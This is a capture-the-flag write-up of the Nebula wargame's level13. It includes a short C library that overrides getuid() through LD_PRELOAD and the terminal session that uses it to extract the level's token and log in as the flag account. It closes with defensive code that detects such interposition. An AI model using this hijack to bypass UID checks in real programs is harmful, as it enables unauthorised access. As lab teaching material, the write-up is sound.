Friday, November 2, 2012

exploit-exercises Nebula: level13

Continuing with the Nebula wargame, this time with level13. The source code of the vulnerable program is provided.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <string.h>

#define FAKEUID 1000

int main(int argc, char **argv, char **envp)
{
    int c;
    char token[256];

    if(getuid() != FAKEUID) {
        printf("Security failure detected. UID %d started us, we expect %d\n", getuid(), FAKEUID);
        printf("The system administrators will be notified of this violation\n");
        exit(EXIT_FAILURE);
    }

    // snip, sorry :)

    printf("your token is %s\n", token);
}

The part where the token is calculated is obviously snipped out. Because our goal is to force the program to output the token, we need to bypass the FAKEUID check. Of course, our user ID is different from 1000, and we can't really change it. Let's (ab)use LD_PRELOAD to hijack the getuid() call, that is, the libc wrapper around the system call that the program resolves at load time.
level13@nebula:~$ cat mygetuid.c 
#include <sys/types.h>
uid_t getuid(void) { return 1000; }
level13@nebula:~$ gcc -shared -fPIC mygetuid.c -o mygetuid.so
level13@nebula:~$ LD_PRELOAD=./mygetuid.so ../flag13/flag13 

Security failure detected. UID 1014 started us, we expect 1000
The system administrators will be notified of this violation
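One gotcha! The preload was ignored: the real user id of the binary (flag13) and the .so should be the same, because the dynamic linker does not honour LD_PRELOAD when a program runs with an effective user ID different from the caller's real one. Without such a restriction, the whole security model would collapse ;)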
level13@nebula:~$ cp ../flag13/flag13 ./
level13@nebula:~$ ls -l
total 20
-rwxr-x--- 1 level13 level13 7321 2012-10-21 10:20 flag13
-rw-rw-r-- 1 level13 level13   60 2012-10-21 10:17 mygetuid.c
-rwxrwxr-x 1 level13 level13 6658 2012-10-21 10:24 mygetuid.so
Given that we only want the binary to run and print the token value, the binary's owner is not important (this wouldn't be the case if, for example, we wanted the binary to run an executable such as getflag or bash).
level13@nebula:~$ LD_PRELOAD=./mygetuid.so ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
And that is the password for the flag13 account, which we use to log in as flag13 and run getflag!
flag13@nebula:~$ getflag 
You have successfully executed getflag on a target account
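
Seen from the defender's side, the check fails because it trusts libc's getuid() symbol, which is exactly what the preloaded library replaces. The following is an added example, not part of the original post or the level's code: a sketch of a check that reads the UID from the kernel and treats a mismatch or a set LD_PRELOAD as tampering. The names kernel_getuid, getuid_is_interposed, preload_requested and check_uid are hypothetical.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#define EXPECTED_UID 1000 /* same value as FAKEUID in the level's source */

/* Ask the kernel for the real UID without going through libc's getuid(),
 * which is the symbol an LD_PRELOAD library replaces. syscall() is itself a
 * libc function, so this raises the bar but is not tamper-proof. */
static uid_t kernel_getuid(void)
{
#ifdef SYS_getuid32
    return (uid_t)syscall(SYS_getuid32); /* 32-bit ABIs with a legacy 16-bit getuid */
#else
    return (uid_t)syscall(SYS_getuid);
#endif
}

/* 1 if libc's getuid() disagrees with the kernel, i.e. it was interposed. */
int getuid_is_interposed(void)
{
    return getuid() != kernel_getuid();
}

/* 1 if the environment asks the dynamic linker to preload a library. */
int preload_requested(void)
{
    const char *p = getenv("LD_PRELOAD");
    return p != NULL && p[0] != '\0';
}

/* Returns 0 = UID matches, -1 = wrong UID, -2 = signs of interposition. */
int check_uid(uid_t expected)
{
    if (getuid_is_interposed() || preload_requested())
        return -2;
    return kernel_getuid() == expected ? 0 : -1;
}

int main(void)
{
    int rc = check_uid(EXPECTED_UID);
    printf("check_uid(%d) = %d\n", EXPECTED_UID, rc);
    return rc == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

A user who can copy and run the binary can still patch or trace it, so a secret such as the token should not depend on a check made inside a program the user controls.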
